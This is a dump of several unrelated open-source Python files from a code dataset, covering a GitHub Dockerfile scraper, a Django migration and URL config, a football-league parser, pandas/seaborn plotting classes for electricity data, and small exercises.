forkedFrom = mongoRepos.find_one({\"name\":g.parent.full_name})\n elif(g.fork):\n print(g.parent.full_name)\n forkedFrom = mongoRepoInsert(g.parent.full_name,g.parent)\n infos[\"forked_from\"] = forkedFrom\n infos[\"readme\"] = BeautifulSoup(pageReadme.text,\"html.parser\").text\n infos[\"url\"] = urlRepo\n infos[\"name\"] = repoName\n return mongoRepos.insert_one(infos).inserted_id\n except rq.exceptions.ConnectionError:\n print(\"ConnectionErro, tentando novamente\")\n return mongoRepoInsert(repoName,g)\n\n\ndef getTotalByApi(bs,repoName,item):\n if(bs == None):\n return getLastPagination(repoName,item)\n else:\n return int(re.sub(',','',bs[0].text.strip()))\n\ndef getLastPagination(repoName,item):\n url = \"https://api.github.com/repos/\"+repoName+\"/\"+item+\"?per_page=1\"\n response = rq.get(url,headers=headers)\n link = response.info().get('Link')\n return int(re.match('.*=(.*)>; rel=\"last\"',link).group(1))\n\ndef dockerfileExtract(repoName, dockerfilePath, mongoRepoInstance):\n savedDockerFile = mongoDockerFiles.find_one({\"repoName\":repoName,\"path\":dockerfilePath})\n if(savedDockerFile is None):\n urlDockerfile = 
\"https://github.com/\"+repoName+\"/blob/\"+mongoRepoInstance.get('default_branch')+\"/\"+dockerfilePath\n page = rq.get(urlDockerfile,headers=headers)\n # ========================================================\n parsed_page = BeautifulSoup(page.text,\"html.parser\").find(\"table\",attrs={'class':'highlight tab-size js-file-line-container'})\n dockerfile = {}\n dockerfileRepo = {}\n dockerfileRepo[\"repo\"]=mongoRepoInstance.get('_id')\n dockerfileRepo[\"repoName\"]=repoName\n dockerfileRepo[\"path\"]=dockerfilePath\n if(parsed_page!=None and parsed_page.find_all(\"td\",attrs={'class':'blob-code blob-code-inner js-file-line'})!=None):\n env=0\n previousDockerLine=\"\"\n dictKey=\"Config1\"\n dockerfile[dictKey]={}\n for td in parsed_page.find_all(\"td\",attrs={'class':'blob-code blob-code-inner js-file-line'}):\n td = td.text.strip()\n if(td.lower().startswith(\"from \")):\n #dockerFrom.append(re.match('\\w{4} (.*)',td).group(1))\n env+=1\n dictKey=\"Config\"+str(env)\n if dictKey in dockerfile:\n dockerfile[dictKey][\"FROM\"]=re.match('\\w{4} (.*)',td).group(1)\n else:\n dockerfile[dictKey]={\"FROM\":re.match('\\w{4} (.*)',td).group(1)}\n previousDockerLine = \"FROM\"\n elif(td.lower().startswith(\"run \")):\n #dockerRun.append(re.match('\\w{3} (.*)',td).group(1))\n if \"RUN\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"RUN\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"RUN\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"RUN\"\n elif(td.lower().startswith(\"add \")):\n #dockerAdd.append(re.match('\\w{3} (.*)',td).group(1))\n if \"ADD\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ADD\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ADD\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"ADD\"\n elif(td.lower().startswith(\"workdir \")):\n #dockerWorkdir.append(re.match('\\w{7} (.*)',td).group(1))\n if \"WORKDIR\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"WORKDIR\"].append(re.match('\\w{7} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"WORKDIR\"]=[re.match('\\w{7} (.*)',td).group(1)]\n previousDockerLine = \"WORKDIR\"\n elif(td.lower().startswith(\"expose \")):\n #dockerExpose.append(re.match('\\w{6} (.*)',td).group(1))\n if \"EXPOSE\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"EXPOSE\"].append(re.match('\\w{6} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"EXPOSE\"]=[re.match('\\w{6} (.*)',td).group(1)]\n previousDockerLine = \"EXPOSE\"\n elif(td.lower().startswith(\"copy \")):\n #dockerCopy.append(re.match('\\w{4} (.*)',td).group(1))\n if \"COPY\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"COPY\"].append(re.match('\\w{4} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"COPY\"]=[re.match('\\w{4} (.*)',td).group(1)]\n previousDockerLine = \"COPY\"\n elif(td.lower().startswith(\"entrypoint \")):\n #dockerEntrypoint.append(re.match('\\w{10} (.*)',td).group(1))\n if \"ENTRYPOINT\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ENTRYPOINT\"].append(re.match('\\w{10} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ENTRYPOINT\"]=[re.match('\\w{10} (.*)',td).group(1)]\n previousDockerLine = \"ENTRYPOINT\"\n elif(td.lower().startswith(\"cmd \")):\n #dockerCmd.append(re.match('\\w{3} (.*)',td).group(1))\n if \"CMD\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"CMD\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"CMD\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"CMD\"\n elif(td.lower().startswith(\"volume \")):\n 
#dockerVolume.append(re.match('\\w{6} (.*)',td).group(1))\n if \"VOLUME\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"VOLUME\"].append(re.match('\\w{6} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"VOLUME\"]=[re.match('\\w{6} (.*)',td).group(1)]\n previousDockerLine = \"VOLUME\"\n elif(td.lower().startswith(\"user \")):\n #dockerUser.append(re.match('\\w{4} (.*)',td).group(1))\n if \"USER\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"USER\"].append(re.match('\\w{4} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"USER\"]=[re.match('\\w{4} (.*)',td).group(1)]\n previousDockerLine = \"USER\"\n elif(td.lower().startswith(\"label \")):\n #dockerLabel.append(re.match('\\w{5} (.*)',td).group(1))\n if \"LABEL\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"LABEL\"].append(re.match('\\w{5} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"LABEL\"]=[re.match('\\w{5} (.*)',td).group(1)]\n previousDockerLine = \"LABEL\"\n elif(td.lower().startswith(\"arg \")):\n #dockerArg.append(re.match('\\w{3} (.*)',td).group(1))\n if \"ARG\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ARG\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ARG\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"ARG\"\n elif(td.lower().startswith(\"env \")):\n #dockerEnv.append(re.match('\\w{3} (.*)',td).group(1))\n if \"ENV\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ENV\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ENV\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"ENV\"\n elif(td.lower().startswith(\"onbuild \")):\n #dockerOnbuild.append(re.match('\\w{7} (.*)',td).group(1))\n if \"ONBUILD\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ONBUILD\"].append(re.match('\\w{7} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ONBUILD\"]=[re.match('\\w{7} (.*)',td).group(1)]\n previousDockerLine = \"ONBUILD\"\n elif(td.lower().startswith(\"maintainer \")):\n #dockerMaintainer = re.match('\\w{10} (.*)',td).group(1)\n if \"MAINTAINER\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"MAINTAINER\"].append(re.match('\\w{10} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"MAINTAINER\"]=[re.match('\\w{10} (.*)',td).group(1)]\n previousDockerLine = \"MAINTAINER\"\n elif(not td):\n previousDockerLine = \"\"\n elif(previousDockerLine == \"RUN\"):\n dockerfile[dictKey][\"RUN\"][-1]=dockerfile[dictKey][\"RUN\"][-1]+td\n elif(previousDockerLine == \"LABEL\"):\n dockerfile[dictKey][\"LABEL\"].append(td)\n dockerfileRepo[\"config\"]=dockerfile\n return mongoDockerFiles.insert_one(dockerfileRepo).inserted_id\n else:\n print(\"Dockerfile já inserido!\")\n return savedDockerFile.get(\"_id\")\n\nt=[]\nq = queue.Queue()\ninitialId=445301\nthreadsNumber=400\ntokenQtd=len(tokens)\nprint(\"Iniciando com id \"+str(initialId))\nfor i in range(initialId,len(results)+1):\n t.append(threading.Thread(target=repoExtractGit,args=(i,results[i-1][1],tokens[i%tokenQtd],results[i-1][2],q,)))\n t[-1].start()\n if(len(t)==threadsNumber):\n resultT=[]\n while(len(resultT)=dia):\n if(fecha.month>=mes):\n añox=(fecha.year)-año\n else:\n añox=(fecha.year)-año-1\n else:\n if(fecha.month>=mes):\n añox=(fecha.year)-año\n else:\n añox=(fecha.year)-año-1\n except:\n print('Error de ingreso. - Ingrese un valor numerico')\n añoa=str(año)\n mesa=str(mes)\n diaa=str(dia)\n añoxa=str(añox)\n print('\\nUsted nacio el dia: : ',dia,' del mes ',mes, ' del año ',año,'. 
Usted tiene: ',añox,'años')\n conn = psycopg2.connect(\n database=\"exam1\", user='postgres', password='123', host='localhost', port= '5432'\n )\n conn.autocommit = True\n cursor = conn.cursor()\n cursor.execute('''INSERT INTO p4 (oo,mes,dia,edad) VALUES (%s, %s, %s, %s)''',(año,mes,dia,añox))\n conn.commit()\n conn.close()\n archivo_texto=open(\"201700325.txt\",\"a\")\n archivo_texto.write('\\n\\nCuarto Programa:\\nUsted nacio el dia: '+diaa+' del mes '+mesa+ ' del año '+añoa+'. Usted tiene: '+añoxa+'años')\n archivo_texto.close()\n elif menu==0:\n break\n else:\n z=int(input('Opcion incorrecta \\n Oprima cualqier letra'))\n except:\n print('Error de ingreso. - Ingrese un valor numerico')\n","repo_name":"EETS7/Python---Examen---Proyectos","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32907691370","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('profiles', '0001_initial'),\n ('correspondence', '0001_initial'),\n ('scanning', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='letter',\n name='document',\n field=models.ForeignKey(blank=True, to='scanning.Document', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='letter',\n name='org',\n field=models.ForeignKey(blank=True, to='profiles.Organization', help_text=b'Organization for the return address for this letter', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='letter',\n name='recipient',\n field=models.ForeignKey(related_name='received_letters', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='letter',\n name='sender',\n field=models.ForeignKey(related_name='authored_letters', blank=True, to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n ]\n","repo_name":"yourcelf/btb","sub_path":"scanblog/correspondence/migrations/0002_auto_20150429_1353.py","file_name":"0002_auto_20150429_1353.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"9951973748","text":"import re\n\nclass Team:\n def __init__(self, name):\n self.name = name\n self.points = 0\n self.goals = 0\n\n def add_points(self, points):\n self.points += points\n \n def add_goals(self, goals):\n self.goals += goals\n\n def __str__(self):\n return f\"{self.name} {self.points}\"\n\n\ndef creat_team(team_name, teams_list):\n if not team_name in list(map(lambda t: t.name, teams_list)):\n team = Team(team_name)\n teams_list.append(team)\n return team\n\n return list(filter(lambda t: t.name == team_name, teams_list))[0]\n \n\ncode = input()\nif '?' 
in code:\n code = code.replace('?', '\\\\?')\n\ndata = input()\nteams_list = []\nwhile data != 'final':\n teams_pattern = r'(?<={code})[A-Za-z]*(?={code})'\n pattern = teams_pattern.format(code = code)\n\n teams = re.findall(pattern, data)\n correct_named_teams = list(map(lambda t: t.upper()[::-1], teams))\n\n team_1 = creat_team(correct_named_teams[0], teams_list)\n team_2 = creat_team(correct_named_teams[1], teams_list)\n\n scores_pattern = r'\\d+:\\d+'\n result_as_str = re.findall(scores_pattern, data)[0].split(':')\n result_int = list(map(int, result_as_str))\n\n if result_int[0] > result_int[1]:\n team_1.add_points(3)\n elif result_int[0] < result_int[1]:\n team_2.add_points(3)\n else:\n team_1.add_points(1)\n team_2.add_points(1)\n\n team_1.add_goals(result_int[0])\n team_2.add_goals(result_int[1])\n \n data = input()\n\nsorted_teams = sorted(teams_list, key=lambda t: (-t.points, t.name))\ntop_3 = sorted(teams_list, key=lambda t: (-t.goals, t.name))[:3]\n\nprint('League standings:')\n[print(f\"{index+1}. {team}\") for index, team in enumerate(sorted_teams)]\n\nprint('Top 3 scored goals:')\n[print(f\"- {team.name} -> {team.goals}\") for team in sorted(top_3, key=lambda t: (t.goals), reverse=True)]","repo_name":"stanislavtz/Python","sub_path":"Fundamentals/Exam-Preparation/Exam-Prep-I/football_league.py","file_name":"football_league.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72090221602","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\n\"\"\"\nClasse para obtenção dos valores nulos de cada variável.\nAtributos:\nfonte: str\ndados: str\n\"\"\"\nclass Nulos:\n \n def __init__(self, fonte, dados):\n self.__fonte = fonte\n self.__dados = dados\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n \"\"\"\n Função que retorna os valores nulos da variável.\n \"\"\"\n def nulos(self):\n valores_nulos = self.__dados.query(f'{self.__fonte} == 0')[self.__fonte]\n if len(valores_nulos) > 0:\n return self.__dados.query(f'{self.__fonte} == 0')[self.__fonte]\n else:\n return valores_nulos\n\n\"\"\"\nClasse que seleciona os valores não nulos de cada variável.\nAtributos:\nfonte: str\ndados: str\n\"\"\" \nclass Selecao:\n\n def __init__(self, fonte, dados):\n self.__fonte = fonte\n self.__dados = dados\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n \"\"\"\n Função que seleciona os valores não nulos de cada variável.\n \"\"\"\n def seleciona(self, dataframe=None):\n\n if dataframe == True:\n\n if len(Nulos(f'{self.__fonte}', self.__dados).nulos() > 0):\n self.__fonte = self.__dados.query(f'{self.__fonte} > 0')\n else:\n self.__fonte = self.__dados\n return self.__fonte\n\n else:\n if len(Nulos(f'{self.__fonte}', self.__dados).nulos() > 0):\n self.__fonte = self.__dados.query(f'{self.__fonte} > 0')[self.__fonte]\n else:\n self.__fonte = self.__dados[f'{self.__fonte}']\n return self.__fonte\n\n\"\"\"\nClasse que seleciona os valores não nulos da variável no dataframe \"soma\".\nAtributos:\nfonte: str\ndados: str\nsoma: str\n\"\"\" \nclass Selecao_Soma:\n \n def __init__(self, fonte, soma):\n self.__fonte = fonte\n self.__soma = soma\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def soma(self):\n return self.__soma\n \n \"\"\"\n Função que seleciona os valores não nulos da variável 
no dataframe \"soma\".\n \"\"\"\n def seleciona(self):\n if len(self.__soma.query(f'{self.__fonte} == 0')[self.__fonte]) > 0:\n self.__fonte = self.__soma.query(f'{self.__fonte} > 1')\n else:\n self.__fonte = self.__soma\n return self.__fonte\n\n\"\"\"\nClasse que seleciona os valores não nulos de cada variável no dataframe \"soma_perc\".\nAtributos:\nfonte: str\ndados: str\nsoma: str\nsoma_perc: str\n\"\"\" \nclass Selecao_Soma_Perc:\n \n def __init__(self, fonte, soma, soma_perc):\n self.__fonte = fonte\n self.__soma = soma\n self.__soma_perc = soma_perc\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def soma(self):\n return self.__soma\n \n @property\n def soma_perc(self):\n return self.__soma_perc\n \n \"\"\"\n Função que seleciona os valores não nulos da variável no dataframe \"soma_perc\".\n \"\"\"\n def seleciona(self):\n lista = []\n for i in self.__soma.query(f'{self.__fonte} > 1').index:\n lista.append(i)\n data = self.__soma_perc.loc[lista[0]:lista[-1]]\n return data \n\n\"\"\"\nClasse que agrega funções referentes à análises estatísticas de cada variável.\nAtributos:\nfonte: str\ndados: str\n\"\"\" \nclass Stats:\n \n def __init__(self, fonte, dados):\n self.__fonte = fonte\n self.__dados = dados\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n \"\"\"\n Função que retorna a descrição de parâmetros estatísticos da variável.\n \"\"\"\n def descricao(self):\n describe = (Selecao(f'{self.__fonte}', self.__dados).seleciona().describe())\n return pd.DataFrame(describe)\n \n \"\"\"\n Função que retorna os valores outliers da variável.\n \"\"\"\n def get_outliers(self):\n FIQ = Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['75%'] - Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['25%']\n inf = Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['25%'] - 1.5*FIQ\n sup = Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['75%'] + 1.5*FIQ\n \n out_inf = pd.DataFrame(self.__dados.query(f'{self.__fonte} < {inf}')[self.__fonte])\n out_sup = pd.DataFrame(self.__dados.query(f'{self.__fonte} > {sup}')[self.__fonte])\n\n if (len(out_inf) > 0) & (len(out_sup) > 0):\n return out_inf, out_sup\n elif (len(out_sup) > 0) & (len(out_inf) == 0):\n return out_sup\n elif (len(out_sup) == 0) & (len(out_inf) > 0):\n return out_inf\n else:\n return print('Sem Outliers')\n\n\"\"\"\nClasse que agrega funções referentes à plotagem dos gráficos de cada variável.\nAtributos:\nfonte: str\ndados: str\nsoma: str\nsoma_perc: str\n\"\"\" \nclass Graficos:\n \n def __init__(self, fonte, dados, soma, soma_perc):\n self.__fonte = fonte\n self.__dados = dados\n self.__soma = soma\n self.__soma_perc = soma_perc\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n @property\n def soma(self):\n return self.__soma\n \n @property\n def soma_perc(self):\n return self.__soma_perc\n\n \"\"\"\n Função que plota um \"boxplot\" analisando o conjunto de dados completo.\n \"\"\"\n def boxplot(self):\n \n # Plot do Gráfico\n fig, ax = plt.subplots(figsize=(20,10))\n ax = sns.boxplot(data=Selecao(f'{self.__fonte}', self.__dados).seleciona(), orient='h', palette='gist_heat_r')\n \n # Personalização\n ax.tick_params(labelsize=16)\n titulo = self.__fonte.replace('_',' ')\n ax.set_title(f'{titulo} (GWh)',fontsize=24)\n ax.set_xlabel('Energia Despachada (GWh)', fontsize=18)\n sns.color_palette(\"GnBu\", as_cmap=True)\n\n return 
plt.show()\n\n \"\"\"\n Função que plota \"boxplots\" referentes à cada mês .\n \"\"\"\n def boxplot_mensal(self):\n \n # Plot do Gráfico\n fig, ax = plt.subplots(figsize=(20,10))\n ax = sns.boxplot(data=Selecao(f'{self.__fonte}', self.__dados).seleciona(dataframe=True), y=self.__fonte, x='month', orient='v', palette='gist_heat_r')\n \n # Personalização\n ax.tick_params(labelsize=16)\n titulo = self.__fonte.replace('_',' ')\n ax.set_title(f'{titulo} (GWh)',fontsize=24)\n ax.set_xlabel('Mês', fontsize=18)\n ax.set_ylabel('Energia Despachada (GWh)', fontsize=18)\n sns.color_palette(\"YlOrBr\", as_cmap=True)\n \n return plt.show()\n\n \"\"\"\n Função que plota um gráfico de linha.\n \"\"\" \n def lineplot(self):\n \n # Plot do Gráfico\n fig,ax = plt.subplots(figsize=(20,10), dpi= 100)\n sns.lineplot(data=Selecao(f'{self.__fonte}', self.__dados).seleciona(), palette='gist_heat_r', color='darkred')\n \n # Personalização\n titulo = self.__fonte.replace('_',' ')\n plt.title(f'{titulo} (GWh)', fontsize=22)\n plt.xticks(rotation=0, fontsize=12, horizontalalignment='center', alpha=.7)\n plt.yticks(fontsize=12, alpha=.7)\n plt.grid(axis='both', alpha=.3)\n ax.set_xlabel('')\n ax.set_ylabel('')\n \n # Remoção de Bordas\n plt.gca().spines[\"top\"].set_alpha(0.0) \n plt.gca().spines[\"bottom\"].set_alpha(0.3)\n plt.gca().spines[\"right\"].set_alpha(0.0) \n plt.gca().spines[\"left\"].set_alpha(0.3)\n \n return plt.show()\n \n \"\"\"\n Função que plota um gráfico de colunas em conjunto com um gráfico de linhas, ambos com eixos y separados.\n \"\"\"\n def mixedplot(self): \n \n # Plot do Gráfico\n fig, ax1 = plt.subplots(figsize=(20,10))\n sns.barplot(data = Selecao_Soma(f'{self.__fonte}', self.__soma).seleciona(), x=Selecao_Soma(f'{self.__fonte}', self.__soma).seleciona().index.year.astype('string'), y=self.__fonte, alpha=0.5, ax=ax1, color = 'orangered')\n ax2 = ax1.twinx()\n sns.lineplot(data = Selecao_Soma_Perc(f'{self.__fonte}', self.__soma, self.__soma_perc).seleciona(), x = Selecao_Soma(f'{self.__fonte}', self.__soma).seleciona().index.year.astype('string'), y = f'{self.__fonte}_perc', marker='o', sort = False, ax=ax2, color='darkred')\n\n # Personalização\n titulo = self.__fonte.replace('_',' ')\n plt.title(f'Evolução Anual: {titulo}', fontsize=22)\n plt.xticks(rotation=0, fontsize=12, horizontalalignment='center', alpha=.7)\n plt.yticks(fontsize=12, alpha=.7)\n plt.grid(axis='both', alpha=.3)\n ax1.set_xlabel('')\n ax1.set_ylabel('Energia Despachada (GWh)', fontsize=18)\n ax2.set_ylabel('Variação Percentual (%)', fontsize=18)\n \n # Linha que indica o eixo y percentual\n plt.axhline(c='black', ls='--')\n \n \"\"\"\n Função que plota um gráfico de área empilhada.\n Atributo:\n selecao: pandas.DataFrame\n \"\"\"\n @classmethod\n def areaplot(cls, selecao):\n \n # Criação do DataFrame de Seleção dos Dados\n col = selecao.columns\n n = len(col)-1\n\n list = []\n labels = []\n for j in range(len(col)-1):\n perc = selecao[col[j+1]]/selecao[col[0]]*100\n list.append(perc)\n labels.append(col[j+1])\n for k in range(len(labels)):\n labels[k] = labels[k].replace('_', ' ')\n \n selecao = pd.concat([selecao, perc], axis=1)\n selecao = selecao.rename(columns = {0: f'{col[j+1]}_per'})\n\n selecao = selecao.reset_index()\n \n # Plot do Gráfico\n fig,ax = plt.subplots(figsize=(18,9.8), dpi= 100)\n colors = sns.color_palette('gist_heat_r', n)\n plt.stackplot(selecao.date, list, labels=labels, colors=colors)\n \n # Personalização\n titulo = col[0].replace('_',' ')\n plt.title(f'Decomposição Percentual: {titulo} 
(%)', fontsize=22)\n plt.xticks(rotation=0, fontsize=12, horizontalalignment='center', alpha=.7)\n plt.yticks(fontsize=12, alpha=.7)\n plt.grid(axis='both', alpha=.3)\n ax.legend(frameon=False, loc=9, ncol=n, fontsize='large') \n ax.set_xlabel('')\n ax.set_ylabel('')\n \n # Remoção de Bordas\n plt.gca().spines[\"top\"].set_alpha(0.0) \n plt.gca().spines[\"bottom\"].set_alpha(0.3)\n plt.gca().spines[\"right\"].set_alpha(0.0) \n plt.gca().spines[\"left\"].set_alpha(0.3)\n \n return plt.show()\n\n\"\"\"\nClasse que agrega funções referentes à funções de avaliação da correlação entre as variáveis.\nAtributos:\nselecao: pandas.DataFrame\n\"\"\" \nclass Correlacao:\n \n def __init__(self, selecao):\n self.__selecao = selecao\n \n @property\n def selecao(self):\n return self.__selecao\n \n \"\"\"\n Função que retornam gráficos de correlação entre as varíaveis em forma matricial, de forma que são plotados:\n Inferiores à diagonal - Gráfico de dispersão entre duas variáveis;\n Diagonal - Histograma daquela variável;\n Superiores à diagonal - Gráfico de distribuição entre duas variáveis do tipo KDE (Kernel Density Estimate).\n \"\"\"\n def pairgrid(self):\n \n g = sns.PairGrid(self.__selecao, diag_sharey=False)\n g.map_upper(sns.scatterplot, color='darkred')\n g.map_lower(sns.kdeplot, cmap = 'Reds')\n g.map_diag(sns.kdeplot, color='darkred')\n \n \"\"\"\n Função que retorna um mapa de calor das variáveis selecionadas.\n \"\"\"\n def heatmap(self):\n \n corrv=np.corrcoef(self.__selecao, rowvar=False)\n mask = np.triu(np.ones_like(np.corrcoef(corrv, rowvar=False)))\n fig, ax = plt.subplots(figsize=(10,6), dpi= 100)\n heatmap = sns.heatmap(corrv, annot=True, linewidths=.5, xticklabels = self.__selecao.columns, yticklabels = self.__selecao.columns, fmt='.2g', mask=mask, ax=ax)\n\n \"\"\"\n Função que retorna valores específicos de correlação entre as variáveis.\n Atributos:\n numero: float (valor de correlação utilizado para comparação)\n relacao: str ('>' ou '<')\n \"\"\"\n def seleciona_corr(self, numero, relacao): \n corrr = self.__selecao.corr().values\n col = self.__selecao.columns\n la = []\n lb = []\n lc = []\n r, c = self.__selecao.shape\n for i in range(c):\n for j in range(i+1, c):\n if relacao == '>':\n if corrr[i, j] > numero:\n la.append(col[i])\n lb.append(col[j])\n lc.append((corrr[i, j]))\n if relacao == '<':\n if corrr[i, j] < numero:\n la.append(col[i])\n lb.append(col[j])\n lc.append((corrr[i, j]))\n dfe = pd.DataFrame({\n 'Variável 1': la,\n 'Variável 2': lb,\n 'Correlação': lc\n })\n dfe = dfe.sort_values(by='Correlação', ascending=False)\n dfe.reset_index(drop=True, inplace=True)\n return dfe","repo_name":"LuanRD/energia-eletrica","sub_path":"classes_eda.py","file_name":"classes_eda.py","file_ext":"py","file_size_in_byte":13558,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17008849809","text":"from django.urls import path\r\n\r\nfrom .views import (\r\n acceptFriendRequest,\r\n deleteFriendRequest,\r\n getFriendRequests,\r\n getFriends,\r\n getFriendSuggestions,\r\n sendFriendRequest,\r\n)\r\n\r\nurlpatterns = [\r\n # auth token required in header for all requests\r\n path(\"friends/\", getFriends), # GET request\r\n path(\"friends/requests/\", getFriendRequests), # GET request\r\n path(\"friends/request/send/\", sendFriendRequest), # POST request\r\n path(\"friends/request/accept/\", acceptFriendRequest), # PUT request\r\n path(\"friends/request/delete//\", deleteFriendRequest), # DELETE request\r\n 
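# backed by getFriendSuggestions, imported from .views at the top of this file\r\n    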
path(\"friends/suggestions/\", getFriendSuggestions), # GET request\r\n # path('friend/unfriend',''), #DELETE request\r\n]\r\n","repo_name":"Anyesh/totoro","sub_path":"friends/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25520276123","text":"class vertex:\n __properties = {}\n __neighbours = {}\n\n def __init__(self, propdict, neighbourdict={}):\n if neighbourdict is None:\n neighbourdict = {}\n vertex.__properties = propdict\n vertex.__neighbours = neighbourdict\n\n def __getitem__(self, key):\n if key == \"neighbours\":\n return [neighbour for neighbour in vertex.__neighbours]\n return vertex.__properties[key]\n\n def __setitem__(self, key, value):\n if key == \"neighbours\" and type(value) != dict:\n raise SyntaxError(\n f\"Incompatible datatype expected a type {type(vertex.__neighbours)} whereas got a{type(value)}\")\n elif key == \"neighbour\" and type(value) == dict:\n vertex.__neighbours = value\n else:\n vertex.__properties[key] = value","repo_name":"Raagulbharatwaj/pyds-0.1.0","sub_path":"pyds/graph/vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16784915443","text":"def check(a):\n global ans, cnt\n if sum(ans) == k:\n cnt += 1\n return\n if sum(ans) > k:\n return\n for i in range(a+1, n):\n ans.append(lst[i])\n check(i)\n ans.pop()\n\n\nip = int(input())\n\nfor case in range(1, ip+1):\n n, k = map(int, input().split())\n lst = list(map(int, input().split()))\n ans = list()\n cnt = 0\n check(-1)\n print(f'#{case} {cnt}')\n","repo_name":"yyytae0/algorithm-training","sub_path":"swea/ssafy/13839.py","file_name":"13839.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5172379063","text":"# Aqui defino algumas funções auxiliares que convertem estruturas de dados do\n# desafio do veiculo ideal\n\nfrom classes_vec_ide import Veiculo, Item, Entrega, Plataforma\n\ndef converte_dict_Itens( itens_info: dict ) -> list:\n\n \"\"\" \n Função que converte lista de dicionários de itens: \n \n itens_info = [\n { 'item': 'leite', 'largura': 1, 'altura': 2, 'espessura': 3, 'peso': 4 },\n { 'item': 'café', 'largura': 2, 'altura': 50, 'espessura': 70, 'peso': 7 }\n ]\n \n Em uma lista de objetos Item. 
\n \"\"\"\n\n nova_lista = []\n\n # Os objetos Item são instanciados e armazenados na nova lista\n\n for item_info in itens_info: \n\n item = Item( item_info['item'], item_info['largura'], item_info['altura'],\n item_info['espessura'], item_info['peso'] )\n\n nova_lista.append(item)\n\n return nova_lista\n\ndef faz_dicionario( lala: Plataforma, ogi: Plataforma ) -> dict: \n \n ''' \n Essa função é responsável por criar as respostas que serão retornadas pela função vec_ide(), \n que serão transformadas em resposta da API para o usuário\n '''\n # Mensages caso os critérios de seleção dos veiculos falhem\n if lala.num_vec > 1: return {'Erro': 'Não selecionou veiculo da Lala'}\n \n if ogi.num_vec > 1: return {'Erro': 'Não selecionou veiculo da Ogi'}\n \n #Mensagens caso o problema tenha tido uma solução \n if lala.num_vec == 0 and ogi.num_vec == 1: \n return { 'Lala':'Não há veiculo adequado', 'Ogi':ogi.veiculos[0].tipo }\n \n if lala.num_vec == 1 and ogi.num_vec == 0: \n return { 'Lala':lala.veiculos[0].tipo, 'Ogi':'Não há veiculo adequado' }\n\n if lala.num_vec == 0 and ogi.num_vec == 0: \n return { 'Lala':'Não há veiculo adequado', 